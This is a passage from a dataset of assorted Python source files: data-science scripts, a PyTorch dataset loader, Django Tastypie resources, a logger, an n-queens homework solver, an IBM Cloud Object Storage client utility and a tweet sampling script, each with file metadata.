already exists in MongoDB collection \n creation_date = tweets_df.created_at.to_list()[0]\n collection.find_one_and_delete({ \"screen_name.0\": user_name, \"created_at.0\": str(creation_date) })\n # print(tweets_df.head())\n \n if mongo_file_name.split(\"-\")[0] in checked_users: \n json_file = tweets_df.to_json()\n mongo_file_content = json.loads(json_file)\n collection.insert_one(mongo_file_content)\n \n \n \n \n \n","sub_path":"Tweet_wrapper_v2.py","file_name":"Tweet_wrapper_v2.py","file_ext":"py","file_size_in_byte":33952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"152833865","text":"import numpy as np\nimport pandas as pd\n\nimport matplotlib.pyplot as plt\n\nfrom sklearn.decomposition import FastICA\n\nticker = 'TSLA2016'\ndf = pd.read_csv('db' + '/{0}.csv'.format(ticker), parse_dates = True)\n\ndf.set_index('Date', inplace = True)\n\nif 'Volume' in df.columns:\n df = df[df['Volume'] != 0]\n\ndf['ids'] = np.linspace(0,1,len(df))\n\ndf['Close'] = df['Close'].apply(lambda X: (X - min(df['Close']))/(max(df['Close']) - min(df['Close'])))\n\n# X[:,1] = (X[:,1] - min(X[:,1]) )/( max(X[:,1]) - min(X[:,1]))\nX = np.array(list(zip(df['ids'],df['Close']))) * np.random.rand(len(df), 2)\n\nica = FastICA()\nS_ica = ica.fit(X)\n\nres = S_ica.transform(X)\n\nplt.scatter(X[:,0], X[:,1])\nplt.scatter(res[:,0], res[:,1])\n\nplt.show()","sub_path":"Tests/Tools_Tests/ICA_test.py","file_name":"ICA_test.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"530960057","text":"import unittest\nfrom website.recom import *\n\n\nclass TestRecom(unittest.TestCase):\n\n def test_recom(self):\n test_df_team = pd.read_csv(\"test_comps\")\n test_df_items = pd.read_csv(\"test_item\")\n result = recommendation([], test_df_team, test_df_items)\n self.assertEqual(result.shape[0], 20)\n self.assertEqual(result.iloc[0,1], \"Chosen Duelists\")\n","sub_path":"functests/test_recom.py","file_name":"test_recom.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"489560639","text":"\"\"\"PyTorch-compatible datasets. 
Cf: https://pytorch.org/docs/stable/data.html \"\"\"\n\nimport os\nimport glob\nimport sys\n\nimport cv2\nimport numpy as np\nfrom PIL import Image\n\nimport torch\nimport torch.utils.data\n\nclass DatasetFiles(torch.utils.data.Dataset):\n \"\"\"Dataset for images stored in slippy map format.\"\"\"\n\n def __init__(self, root, mode, transform=None):\n super().__init__()\n\n self.files = []\n self.transform = transform\n\n root = os.path.expanduser(root)\n self.files = [path for path in glob.glob(os.path.join(root, \"*.*\"))]\n self.files.sort(key=lambda file: file)\n self.mode = mode\n\n def __len__(self):\n return len(self.files)\n\n def __getitem__(self, i):\n path = self.files[i]\n\n if self.mode == \"mask\":\n image = np.array(Image.open(path).convert(\"P\"))\n\n elif self.mode == \"image\":\n path = os.path.expanduser(path)\n image = cv2.imread(path, cv2.IMREAD_ANYCOLOR)\n\n if self.transform is not None:\n image = self.transform(image)\n\n return image,path\n\n\nclass DatasetFilesConcat(torch.utils.data.Dataset):\n \"\"\"Dataset to concate multiple input images stored in slippy map format.\"\"\"\n\n def __init__(self, path, channels, target, joint_transform=None):\n super().__init__()\n\n assert len(channels)\n self.channels = channels\n self.inputs = dict()\n\n for channel in channels:\n for band in channel[\"bands\"]:\n self.inputs[channel[\"sub\"]] = DatasetFiles(os.path.join(path, channel[\"sub\"]), mode=\"image\")\n\n self.target = DatasetFiles(target, mode=\"mask\")\n self.joint_transform = joint_transform\n\n def __len__(self):\n return len(self.target)\n\n def __getitem__(self, i):\n\n mask,path = self.target[i]\n\n for channel in self.channels:\n try:\n data,path = self.inputs[channel[\"sub\"]][i]\n\n for band in channel[\"bands\"]:\n data_band = data[:, :, int(band) - 1] if len(data.shape) == 3 else []\n data_band = data_band.reshape(mask.shape[0], mask.shape[1], 1)\n tensor = np.concatenate((tensor, data_band), axis=2) if \"tensor\" in locals() else data_band # noqa F821\n except:\n sys.exit(\"Unable to concatenate input Tensor\")\n\n if self.joint_transform is not None:\n tensor, mask = self.joint_transform(tensor, mask)\n\n return tensor, mask,path\n","sub_path":"robosat_pink/flat_datasets.py","file_name":"flat_datasets.py","file_ext":"py","file_size_in_byte":2518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"80224864","text":"from tastypie import fields\nfrom tastypie.resources import ModelResource\nfrom tastypie.authorization import Authorization\nfrom models import Transaction, Category, Entity, File\n\nclass CategoryResource(ModelResource):\n class Meta:\n queryset = Category.objects.all()\n resource_name = 'category'\n authorization = Authorization()\n\nclass EntityResource(ModelResource):\n class Meta:\n queryset = Entity.objects.all()\n resource_name = 'entity'\n authorization = Authorization()\n\nclass FileResource(ModelResource):\n class Meta:\n queryset = File.objects.all()\n resource_name = 'file'\n authorization = Authorization()\n\nclass TransactionResource(ModelResource):\n\n category = fields.ForeignKey(CategoryResource, 'category')\n entity = fields.ForeignKey(EntityResource, 'entity')\n files = fields.ToManyField(FileResource, 'files')\n transactions = fields.ToManyField(FileResource, 'transactions')\n\n class Meta:\n queryset = Transaction.objects.all()\n resource_name = 'transaction'\n authorization = 
Authorization()\n\n","sub_path":"curo-api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"123662081","text":"class Book :\n def __init__(self, title, author, year, editorial, category):\n self.title = title\n self.author = author\n self.year = year\n self.editorial = editorial\n self.category = category\n \n def displayBook(self):\n q = max(len(\"Title: \" + self.title), \n len(\"Author: \" + self.author), \n len(\"Year: \" + self.year),\n len(\"Category: \" + self.category),\n len(\"Editorial: \" + self.editorial),\n )\n separator = (\"*\"*q)+\"**\"\n\n print(\"\\n{}\".format(separator))\n print(\" Title: {}\".format(self.title)) \n print(\" Author: {}\".format(self.author)) \n print(\" Year: {}\".format(self.year)) \n print(\" Category: {}\".format(self.category)) \n print(\" Editorial: {}\".format(self.editorial)) \n print(\"{} \\n\".format(separator))\n\n \n\n\n","sub_path":"Python - MongoDB CRUD/Model/book_base.py","file_name":"book_base.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"113866650","text":"#/usr/bin/env python\n# -*- coding:utf-8 -*-\n'''\n @File : socket-client.py \n @Contact : guoxin@126.com\n @License : (C)Copyright 2018-2019, xguo\n\n@Modify Time @Author @Version @Desciption\n------------ ------- -------- -----------\n2020/1/12 16:25 xguo 1.0 None\n\n'''\nimport socket\n\ndef main():\n s=socket.socket()\n host=socket.gethostname()\n port=1234\n\n s.connect((host,port))\n print(s.recv(1024))\n\nif __name__ == \"__main__\":\n main()","sub_path":"socket-test/socket-client.py","file_name":"socket-client.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"207783803","text":"import logging\nimport os\nimport datetime\n\nclass Logger(logging.Logger):\n\n file_format = '%(asctime)s.%(msecs)3d %(levelname)-8s %(module)s - %(funcName)s: %(message)s'\n console_format = '%(asctime)s %(levelname)-8s %(name)-12s: %(message)s'\n date_format = '%Y-%m-%d %H:%M:%S'\n path = \"Logs/\"\n\n def __init__(self, name,file_path=None,log_level=logging.INFO,log_console=True):\n if not file_path:\n file_path = Logger.path\n if not os.path.exists(file_path):\n os.makedirs(file_path)\n\n logging.Logger.__init__(self,name)\n run_time = datetime.datetime.now().strftime(\"%d-%m__%H-%M-%S\")\n logging.basicConfig(\n filename='{}/{}__{}'.format(file_path, name, run_time),\n level=log_level,\n format=Logger.file_format,\n datefmt=Logger.date_format)\n\n if log_console:\n console = logging.StreamHandler()\n console.setLevel(logging.INFO)\n formatter = logging.Formatter(Logger.console_format)\n # tell the handler to use this format\n console.setFormatter(formatter)\n logging.Logger.addHandler(self,console)","sub_path":"utils/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"107102716","text":"import numpy as np\r\nc = 0\r\nres = 0\r\nf = open(\"input.txt\",\"r\")\r\nout = open(\"output.txt\",\"w\")\r\niplines = f.readlines()\r\nlines = [x.strip() for x in iplines]\r\nn = int(lines[0])\r\na = np.zeros(shape=(n,n),dtype=np.int64)\r\nscoot = int(lines[2])\r\ntscoot = scoot * 12\r\n\r\nfor line in lines[3:tscoot+3]:\r\n ind = line.split(',')\r\n i = 
int(ind[0])\r\n j = int(ind[1])\r\n a[i][j] = a[i][j] + 1\r\n\r\nofficers = int(lines[1])\r\n\r\ndef replacePos(b, row, col):\r\n for i in range(n):\r\n b[row][i] = -1\r\n b[i][col] = -1\r\n for j in range(n):\r\n if abs(i - row) == abs(j - col):\r\n b[i][j] = -1\r\n\r\n\r\ndef counter(array):\r\n val = np.argmax(array)\r\n i = val // n\r\n j = val % n\r\n cop[i][j] = 0\r\n return val\r\n\r\n\r\ndef isSafePos(grid, row, col):\r\n for i in range(n):\r\n if grid[row][i] == 1 or grid[i][col] == 1:\r\n return False\r\n\r\n for i in range(n):\r\n for j in range(n):\r\n if abs(i - row) == abs(j - col) and (grid[i][j] == 1):\r\n return False\r\n return True\r\n\r\n\r\ndef solution(grid, col):\r\n global c\r\n global res\r\n if c > res and col == n:\r\n res = c\r\n return\r\n if col == n:\r\n return\r\n for x in range(0, n):\r\n if isSafePos(grid, x, col):\r\n grid[x][col] = 1\r\n c += a[x][col]\r\n solution(grid, col+1)\r\n grid[x][col] = 0\r\n c -= a[x][col]\r\n\r\n\r\nif officers == 1:\r\n count = np.max(a)\r\n out.write(\"%i\" % (count))\r\n\r\nelif officers < n:\r\n res = 0\r\n cop = np.copy(a)\r\n indices = []\r\n for i in range(0, n*n):\r\n r = counter(cop)\r\n indices.append(r)\r\n\r\n for index in indices:\r\n b = np.copy(a)\r\n c = 0\r\n row = index // n\r\n col = index % n\r\n c += a[row][col]\r\n replacePos(b, row, col)\r\n for i in range(officers-1):\r\n val = np.argmax(b)\r\n i = val // n\r\n j = val % n\r\n c += a[i, j]\r\n replacePos(b,i,j)\r\n\r\n if c > res:\r\n res = c\r\n out.write(\"%i\" % (res))\r\nelse:\r\n grid = np.zeros(shape=(n, n), dtype=np.int64)\r\n solution(grid, 0)\r\n out.write(\"%i\" % (res))\r\n","sub_path":"hw1cs561f2018.py","file_name":"hw1cs561f2018.py","file_ext":"py","file_size_in_byte":2209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"533161356","text":"# *****************************************************************************\r\n# © Copyright IBM Corp. 2018. All Rights Reserved.\r\n#\r\n# This program and the accompanying materials\r\n# are made available under the terms of the Apache V2.0\r\n# which accompanies this distribution, and is available at\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# *****************************************************************************\r\n\r\nimport os\r\nimport tempfile\r\nimport dill as pickle\r\nimport requests\r\nimport datetime\r\nfrom urllib.parse import quote, urlparse\r\nfrom base64 import b64encode\r\nimport hashlib\r\nimport hmac\r\nfrom lxml import etree\r\nimport logging\r\nimport pandas as pd\r\nlogger = logging.getLogger(__name__)\r\ntry:\r\n import ibm_boto3\r\n from ibm_boto3.s3.transfer import S3Transfer\r\n from ibm_botocore.client import Config\r\nexcept (ImportError,ModuleNotFoundError):\r\n IBMBOTO_INSTALLED = False\r\n
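 # Added note (not part of the original module): without ibm_boto3 only the\r\n # HMAC-based CosClient below is usable; cosSave, cosLoad and\r\n # getCosTransferAgent require IAM credentials plus ibm_boto3.\r\n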
 msg = 'ibm_boto3 is not installed. Use HMAC credentials to communicate with COS.'\r\n logger.info(msg)\r\nelse:\r\n IBMBOTO_INSTALLED = True\r\n \r\ndef compare_dataframes(dfl,dfr,cols=None):\r\n '''\r\n Explain the differences between 2 dataframes.\r\n Returns (differences, trace, df) where df contains the non-matching rows.\r\n '''\r\n \r\n if cols is None:\r\n cols = list(dfl.columns)\r\n \r\n differences = 0\r\n trace = ''\r\n if len(dfl.index) != len(dfr.index):\r\n msg = 'Row count: %s vs %s' %(len(dfl.index),len(dfr.index))\r\n trace = trace + msg\r\n differences += abs(len(dfl.index) - len(dfr.index))\r\n missing_l = set(cols) - set(dfl.columns)\r\n if len(missing_l) != 0:\r\n msg = 'dfl is missing columns: %s' %(missing_l)\r\n trace = trace + msg\r\n cols = [x for x in cols if x not in missing_l]\r\n differences += len(missing_l) * len(dfl.index)\r\n missing_r = set(cols) - set(dfr.columns)\r\n if len(missing_r) != 0:\r\n msg = 'dfr is missing columns: %s' %(missing_r)\r\n trace = trace + msg\r\n cols = [x for x in cols if x not in missing_r]\r\n differences += len(missing_r) * len(dfr.index)\r\n \r\n dfl = dfl[cols].reindex()\r\n dfr = dfr[cols].reindex()\r\n \r\n dfs = {'dfl':dfl,\r\n 'dfr':dfr}\r\n df = pd.concat(dfs)\r\n total_rows = len(df.index)\r\n df = df.drop_duplicates(keep=False)\r\n if not df.empty and total_rows - len(df.index) > 0:\r\n msg = 'Rows with different contents:%s' %(total_rows - len(df.index))\r\n trace = trace + msg\r\n differences = differences + total_rows - len(df.index)\r\n \r\n return (differences,trace,df)\r\n \r\n\r\nclass CosClient:\r\n '''\r\n Cloud Object Storage client\r\n '''\r\n def __init__(self, credentials):\r\n self._cod_hmac_access_key_id = credentials['objectStorage']['username']\r\n self._cod_hmac_secret_access_key = credentials['objectStorage']['password']\r\n self._cos_region = credentials['objectStorage']['region']\r\n self._cos_endpoint = credentials['config']['objectStorageEndpoint']\r\n\r\n if self._cos_region is None or len(self._cos_region.strip()) == 0:\r\n self._cos_region = 'any-region'\r\n\r\n # hashing and signing methods\r\n def _hash(self, key, msg):\r\n return hmac.new(key, msg.encode('utf-8'), hashlib.sha256).digest()\r\n\r\n # region is a wildcard value that takes the place of the AWS region value\r\n # as COS doesn't use the same conventions for regions, this parameter can accept any string\r\n def _create_signature_key(self, key, datestamp, region, service):\r\n keyDate = self._hash(('AWS4' + key).encode('utf-8'), datestamp)\r\n keyString = self._hash(keyDate, region)\r\n keyService = self._hash(keyString, service)\r\n keySigning = self._hash(keyService, 'aws4_request')\r\n return keySigning\r\n\r\n def _cos_api_request(self, http_method, bucket, key, request_parameters=None, payload='', extra_headers=None, binary=False):\r\n if extra_headers is None:\r\n extra_headers = {}\r\n # it seems region is not used by IBM COS and can be any string (but cannot be None below still)\r\n if any([(var is None or len(var.strip()) == 0) for var in [self._cod_hmac_access_key_id, self._cod_hmac_secret_access_key, self._cos_endpoint, bucket]]):\r\n logger.warning('write COS is disabled because not all COS config environment variables are set')\r\n return None\r\n # assemble the standardized request\r\n\r\n time = datetime.datetime.utcnow()\r\n timestamp = time.strftime('%Y%m%dT%H%M%SZ')\r\n datestamp = time.strftime('%Y%m%d')\r\n\r\n url = urlparse(self._cos_endpoint)\r\n scheme = url.scheme\r\n host = url.netloc\r\n\r\n payload_hash = hashlib.sha256(str.encode(payload) if isinstance(payload, str) else payload).hexdigest()\r\n standardized_resource = '/'\r\n
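 # Added note (not part of the original module): the resource and query string\r\n # assembled below must match the values hashed into the SigV4 signature\r\n # further down, otherwise COS rejects the request.\r\n 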
if bucket is not None:\r\n standardized_resource += bucket\r\n if key is not None:\r\n standardized_resource += '/' + key\r\n if request_parameters is None:\r\n standardized_querystring = ''\r\n else:\r\n standardized_querystring = '&'.join(['%s=%s' % (quote(k, safe=''), quote(v, safe='')) for k,v in request_parameters.items()])\r\n\r\n all_headers = {'host': host, 'x-amz-content-sha256': payload_hash, 'x-amz-date': timestamp}\r\n all_headers.update({k.lower(): v for k, v in extra_headers.items()})\r\n standardized_headers = ''\r\n for header in sorted(all_headers.keys()):\r\n standardized_headers += '%s:%s\\n' % (header, all_headers[header])\r\n signed_headers = ';'.join(sorted(all_headers.keys()))\r\n # standardized_headers = 'host:' + host + '\\n' + 'x-amz-content-sha256:' + payload_hash + '\\n' + 'x-amz-date:' + timestamp + '\\n'\r\n # signed_headers = 'host;x-amz-content-sha256;x-amz-date'\r\n\r\n standardized_request = (http_method + '\\n' +\r\n standardized_resource + '\\n' +\r\n standardized_querystring + '\\n' +\r\n standardized_headers + '\\n' +\r\n signed_headers + '\\n' +\r\n payload_hash)\r\n\r\n logging.debug('standardized_request=\\n%s' % standardized_request)\r\n\r\n # assemble string-to-sign\r\n hashing_algorithm = 'AWS4-HMAC-SHA256'\r\n credential_scope = datestamp + '/' + self._cos_region + '/' + 's3' + '/' + 'aws4_request'\r\n sts = (hashing_algorithm + '\\n' +\r\n timestamp + '\\n' +\r\n credential_scope + '\\n' +\r\n hashlib.sha256(str.encode(standardized_request)).hexdigest())\r\n\r\n logging.debug('string-to-sign=\\n%s' % sts)\r\n\r\n # generate the signature\r\n signature_key = self._create_signature_key(self._cod_hmac_secret_access_key, datestamp, self._cos_region, 's3')\r\n signature = hmac.new(signature_key,\r\n (sts).encode('utf-8'),\r\n hashlib.sha256).hexdigest()\r\n\r\n logging.debug('signature=\\n%s' % signature)\r\n\r\n # assemble all elements into the 'authorization' header\r\n v4auth_header = (hashing_algorithm + ' ' +\r\n 'Credential=' + self._cod_hmac_access_key_id + '/' + credential_scope + ', ' +\r\n 'SignedHeaders=' + signed_headers + ', ' +\r\n 'Signature=' + signature)\r\n\r\n logging.debug('v4auth_header=\\n%s' % v4auth_header)\r\n\r\n # the 'requests' package autmatically adds the required 'host' header\r\n headers = all_headers.copy()\r\n headers.pop('host')\r\n headers['Authorization'] = v4auth_header\r\n # headers = {'x-amz-content-sha256': payload_hash, 'x-amz-date': timestamp, 'Authorization': v4auth_header}\r\n\r\n if standardized_querystring == '':\r\n request_url = self._cos_endpoint + standardized_resource\r\n else:\r\n request_url = self._cos_endpoint + standardized_resource + '?' 
+ standardized_querystring\r\n\r\n logging.debug('request_url=%s' % request_url)\r\n\r\n if http_method == 'GET':\r\n resp = requests.get(request_url, headers=headers, timeout=30, verify=True)\r\n elif http_method == 'DELETE':\r\n resp = requests.delete(request_url, headers=headers, timeout=30, verify=True)\r\n elif http_method == 'POST':\r\n resp = requests.post(request_url, headers=headers, data=payload, timeout=30, verify=True)\r\n elif http_method == 'PUT':\r\n resp = requests.put(request_url, headers=headers, data=payload, timeout=30, verify=True)\r\n else:\r\n raise RuntimeError('unsupported_http_method=%s' % http_method)\r\n\r\n if resp.status_code != requests.codes.ok and not (resp.status_code == requests.codes.no_content and http_method == 'DELETE'):\r\n logger.warning('error cos_api_request: request_url=%s, http_method=%s, status_code=%s, response_text=%s' % (request_url, http_method, str(resp.status_code), str(resp.text)))\r\n return None\r\n\r\n return resp.content if binary else resp.text\r\n\r\n def cos_get(self, key, bucket, request_parameters=None, binary=False):\r\n\r\n response = self._cos_api_request('GET', bucket=bucket, key=key, request_parameters=request_parameters, binary=binary)\r\n if response is not None:\r\n response = pickle.loads(response)\r\n\r\n return response\r\n\r\n def cos_find(self, prefix, bucket):\r\n result = self.cos_get(key=None, bucket=bucket, request_parameters={'list-type':'2','prefix':prefix})\r\n if result is None:\r\n return []\r\n\r\n root = etree.fromstring(str.encode(result))\r\n return [elem.text for elem in root.findall('Contents/Key', root.nsmap)]\r\n\r\n def cos_put(self, key, payload, bucket, binary=False):\r\n if payload is not None:\r\n payload = pickle.dumps(payload)\r\n else:\r\n payload = ''\r\n\r\n return self._cos_api_request('PUT', bucket=bucket, key=key, payload=payload, binary=binary)\r\n\r\n\r\n def cos_delete(self, key, bucket):\r\n return self._cos_api_request('DELETE', bucket=bucket, key=key)\r\n\r\n\r\n def cos_delete_multiple(self, keys, bucket):\r\n if keys is None or len(keys) == 0:\r\n return ''\r\n\r\n payload = ''\r\n for key in keys:\r\n payload += '%s' % key\r\n payload += ''\r\n\r\n md5 = hashlib.md5(str.encode(payload)).digest()\r\n base64 = b64encode(md5).decode()\r\n logger.debug('content-md5: %s' % base64)\r\n\r\n extra_headers = {\r\n 'Content-Type': 'text/plain; charset=utf-8',\r\n 'Content-MD5': base64\r\n }\r\n\r\n request_parameters = {'delete': ''}\r\n return self._cos_api_request('POST', bucket=bucket, key=None, payload=payload, request_parameters=request_parameters, extra_headers=extra_headers)\r\n \r\n\r\ndef cosSave(obj,bucket,filename,credentials):\r\n '''\r\n Use IAM credentials to write an object to Cloud Object Storage\r\n '''\r\n try:\r\n fhandle, fname = tempfile.mkstemp(\"cosfile\")\r\n os.close(fhandle) \r\n with open(fname, 'wb') as file_obj:\r\n pickle.dump(obj, file_obj)\r\n transfer = getCosTransferAgent(credentials)\r\n transfer.upload_file(fname, bucket, filename)\r\n os.unlink(fname)\r\n\r\n except Exception as ex:\r\n logging.exception(ex)\r\n return filename\r\n\r\n\r\n\r\ndef cosLoad(bucket,filename,credentials):\r\n '''\r\n Use IAM credentials to read an object from Cloud Object Storage\r\n '''\r\n try:\r\n fhandle, fname = tempfile.mkstemp(\"cosfile\")\r\n os.close(fhandle)\r\n transfer = getCosTransferAgent(credentials)\r\n transfer.download_file(bucket, filename, fname)\r\n answer = None\r\n with open(fname, 'rb') as file_obj:\r\n answer = pickle.load(file_obj)\r\n 
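# Added note (not part of the original module): the temporary file is removed\r\n # only after the pickle has been fully read; failures are logged below.\r\n 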
os.unlink(fname)\r\n return answer\r\n\r\n except Exception as ex:\r\n logging.exception(ex)\r\n\r\n\r\n\r\ndef getCosTransferAgent(credentials):\r\n '''\r\n Use IAM credentials to obtain a Cloud Object Storage transfer agent object\r\n '''\r\n if IBMBOTO_INSTALLED:\r\n endpoints = requests.get(credentials.get('endpoints')).json()\r\n iam_host = (endpoints['identity-endpoints']['iam-token'])\r\n cos_host = (endpoints['service-endpoints']['cross-region']['us']['public']['us-geo'])\r\n api_key = credentials.get('apikey')\r\n service_instance_id = credentials.get('resource_instance_id')\r\n auth_endpoint = \"https://\" + iam_host + \"/oidc/token\"\r\n service_endpoint = \"https://\" + cos_host\r\n cos = ibm_boto3.client('s3',\r\n ibm_api_key_id=api_key,\r\n ibm_service_instance_id=service_instance_id,\r\n ibm_auth_endpoint=auth_endpoint,\r\n config=Config(signature_version='oauth'),\r\n endpoint_url=service_endpoint)\r\n return S3Transfer(cos)\r\n else:\r\n raise ValueError('Attempting to use IAM credentials to communicate with COS. IBMBOTO is not installed. You make use HMAC credentials and the CosClient instead.')\r\n\r\ndef log_df_info(df,msg,include_data=False):\r\n '''\r\n Log a debugging entry showing first row and index structure\r\n '''\r\n try:\r\n msg = msg + ' df count: %s ' %(len(df.index))\r\n if df.index.names != [None]:\r\n msg = msg + ' ; index: %s ' %(','.join(df.index.names))\r\n else:\r\n msg = msg + ' ; index is unnamed'\r\n if include_data:\r\n msg = msg + ' ; 1st row: '\r\n try:\r\n cols = df.head(1).squeeze().to_dict() \r\n for key,value in list(cols.items()):\r\n msg = msg + '%s : %s, ' %(key, value)\r\n except AttributeError:\r\n msg = msg + str(df.head(1))\r\n else:\r\n msg = msg + ' ; columns: %s' %(','.join(list(df.columns)))\r\n logger.debug(msg)\r\n return msg\r\n except Exception:\r\n logger.warning('dataframe contents not logged due to an unknown logging error')\r\n return ''\r\n \r\ndef resample(df,time_frequency,timestamp,dimensions=None,agg=None, default_aggregate = 'last'):\r\n '''\r\n Resample a dataframe to a new time grain / dimensional grain\r\n \r\n Parameters:\r\n -----------\r\n df: Pandas dataframe\r\n Dataframe to resample\r\n time_frequency: str\r\n Pandas frequency string\r\n dimensions: list of strs\r\n List of columns to group by\r\n agg : dict\r\n Pandas aggregate dictionary\r\n default_aggregate: str\r\n Default aggregation function to apply for anything not specified in agg\r\n \r\n Returns\r\n -------\r\n Pandas dataframe\r\n \r\n '''\r\n if dimensions is None:\r\n dimensions = []\r\n if agg is None:\r\n agg = {}\r\n \r\n df = df.reset_index()\r\n\r\n index_cols = [timestamp]\r\n index_cols.extend(dimensions) \r\n for r in [x for x in df.columns if x not in index_cols]:\r\n try:\r\n agg[r]\r\n except KeyError:\r\n agg[r] = default_aggregate\r\n\r\n group_base = [pd.Grouper(key = timestamp, freq = time_frequency)]\r\n for d in dimensions:\r\n group_base.append(pd.Grouper(key = d))\r\n \r\n df = df.groupby(group_base).agg(agg)\r\n df.reset_index(inplace=True)\r\n \r\n return df\r\n \r\nclass MemoryOptimizer:\r\n '''\r\n Util class used to optimize the pipeline memory consumption using native Pandas downcasting\r\n '''\r\n\r\n def printCurrentMemoryConsumption(self, df):\r\n logger.info('Memory consumed by the data frame: \\n %s' % df.memory_usage(deep=True))\r\n\r\n def printUsagePerType(self, df):\r\n for dtype in ['float', 'int', 'object']:\r\n selected_dtype = df.select_dtypes(include=[dtype])\r\n mean_usage_b = 
selected_dtype.memory_usage(deep=True).mean()\r\n mean_usage_mb = mean_usage_b / 1024 ** 2\r\n logger.info(\"Average memory usage for {} columns: {:03.2f} MB\".format(dtype, mean_usage_mb))\r\n\r\n def downcastInteger(self, df):\r\n df_new = df.copy()\r\n\r\n logger.info('Applying downcast to Integer columns.')\r\n\r\n try:\r\n df_int = df_new.select_dtypes(include=['int'])\r\n\r\n if not df_int.empty:\r\n df_converted = df_int.apply(pd.to_numeric, downcast='unsigned')\r\n for col in df_converted.columns:\r\n df_new[col] = df_converted[col]\r\n except:\r\n logger.warning('Not able to downcast Integer')\r\n return df_new\r\n\r\n return df_new\r\n\r\n\r\n def downcastFloat(self, df, precision='float'):\r\n df_new = df.copy()\r\n\r\n logger.info('Applying downcast to Float columns.')\r\n\r\n try:\r\n df_float = df_new.select_dtypes(include=['float'])\r\n\r\n if not df_float.empty:\r\n df_converted = df_float.apply(pd.to_numeric, downcast=precision)\r\n for col in df_converted.columns:\r\n df_new[col] = df_converted[col]\r\n except:\r\n logger.warning('Not able to downcast Float types')\r\n return df_new\r\n\r\n return df_new\r\n\r\n\r\n def getColumnsForCategorization(self, df, threshold=0.5):\r\n '''\r\n It generates a list of columns that are eligible to be categorized.\r\n A column is eligible when its number of unique values is proportionally\r\n lower than the threshold (default 50%) of the total number of rows.\r\n '''\r\n\r\n df_new = df.select_dtypes(include=['object']).copy()\r\n\r\n lst_columns = []\r\n for col in df_new.columns:\r\n num_unique_values = len(df_new[col].unique())\r\n num_total_values = len(df_new[col])\r\n if num_unique_values / num_total_values < threshold:\r\n logger.info('Column eligible for categorization: %s' % col)\r\n lst_columns.append(col)\r\n\r\n return lst_columns\r\n\r\n\r\n def downcastString(self, df, lst_columns):\r\n '''\r\n It converts a data frame column of type object into a categorical type\r\n '''\r\n\r\n logger.info('Applying downcast to String columns. %s' % str(lst_columns))\r\n\r\n df_new = df.select_dtypes(include=['object']).copy()\r\n\r\n try:\r\n for col in lst_columns:\r\n df_new.loc[:, col] = df_new[col].astype('category')\r\n except:\r\n logger.warning('Not able to downcast String to category')\r\n return df\r\n\r\n return df_new\r\n\r\n\r\n def downcastNumeric(self, df):\r\n\r\n logger.info('Optimizing memory. Before applying downcast.')\r\n self.printUsagePerType(df)\r\n self.printCurrentMemoryConsumption(df)\r\n\r\n df_new = self.downcastInteger(df)\r\n df_new = self.downcastFloat(df_new)\r\n\r\n logger.info('Optimizing memory. After applying downcast.')\r\n self.printUsagePerType(df_new)\r\n self.printCurrentMemoryConsumption(df_new)\r\n\r\n return df_new\r\n\r\nclass StageException(Exception):\r\n EXTENSION_DICT = 'extensionDict'\r\n STAGENAME = 'stageName'\r\n STAGEINFO = 'stageInfo'\r\n def __init__(self, msg, stageName=None, stageInfo=None):\r\n super().__init__(msg)\r\n setattr(self, StageException.EXTENSION_DICT, {StageException.STAGENAME: stageName, StageException.STAGEINFO: stageInfo})\r\n ","sub_path":"iotfunctions/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":19424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"182409908","text":"DATA_DIR = \"../data/\"\nCSV_NAME = \"04-Feb-2019_similar_removed\"\n
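# Added note (not part of the original script): FIELDS is passed to csv.DictReader\n# as its fieldnames, so it must match the column order of the scraped CSV; the\n# file's own header row is then skipped with next(reader).\n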
FIELDS = [\"Username\", \"Full name\", \"URL\", \"Timestamp\", \"Content\", \"No. replies\", \"No. retweets\", \"No. likes\"]\nCOUNT = 1000\n\nif __name__ == '__main__':\n import csv\n import random\n\n from tqdm import tqdm\n\n print(\"Writing to file...\")\n with open(DATA_DIR + CSV_NAME + '.csv', 'r', encoding='utf-8', newline='') as f:\n reader = csv.DictReader(f, FIELDS)\n next(reader)\n filepath = \"{}_random_{}.csv\".format(DATA_DIR + CSV_NAME, COUNT)\n with open(filepath, 'a', encoding='utf-8', newline='') as w:\n writer = csv.writer(w)\n writer.writerow([\"Row Number\", \"Content\", \"Label\"])\n rows_written = 0\n for i, row in tqdm(enumerate(reader), total=COUNT):\n if random.random() >= 0.9:\n writer.writerow([i, row[\"Content\"]])\n rows_written += 1\n if rows_written == COUNT:\n break\n print(\"Done. Selected tweets are written to\", filepath)\n","sub_path":"build/lib/classifier/get_random_tweet.py","file_name":"get_random_tweet.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
